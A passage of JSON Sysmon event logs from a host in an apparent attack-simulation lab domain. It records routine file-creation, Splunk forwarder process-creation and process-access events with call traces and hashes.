(x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7092,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:56.618\r\nProcessGuid: {E2A3D6B1-12EB-5F25-0000-0010585D0A00}\r\nProcessId: 3028\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bd4-0\\System.Xaml.dll\r\nCreationUtcTime: 2020-08-01 06:59:56.618","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:56.618","ProcessGuid":"{E2A3D6B1-12EB-5F25-0000-0010585D0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bd4-0\\System.Xaml.dll","CreationUtcTime":"2020-08-01 06:59:56.618","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7093,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.635\r\nProcessGuid: {E2A3D6B1-12EC-5F25-0000-0010ED600A00}\r\nProcessId: 5008\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.635","ProcessGuid":"{E2A3D6B1-12EC-5F25-0000-0010ED600A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7094,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.634\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-12EC-5F25-0000-0010ED600A00}\r\nTargetProcessId: 5008\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.634","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-12EC-5F25-0000-0010ED600A00}","TargetProcessId":"5008","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7095,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.634\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12EC-5F25-0000-0010ED600A00}\r\nTargetProcessId: 5008\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.634","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12EC-5F25-0000-0010ED600A00}","TargetProcessId":"5008","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7096,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.634\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.634","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7097,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.634\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.634","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7098,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.634\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.634","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7099,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.634\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.634","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7100,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.634\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 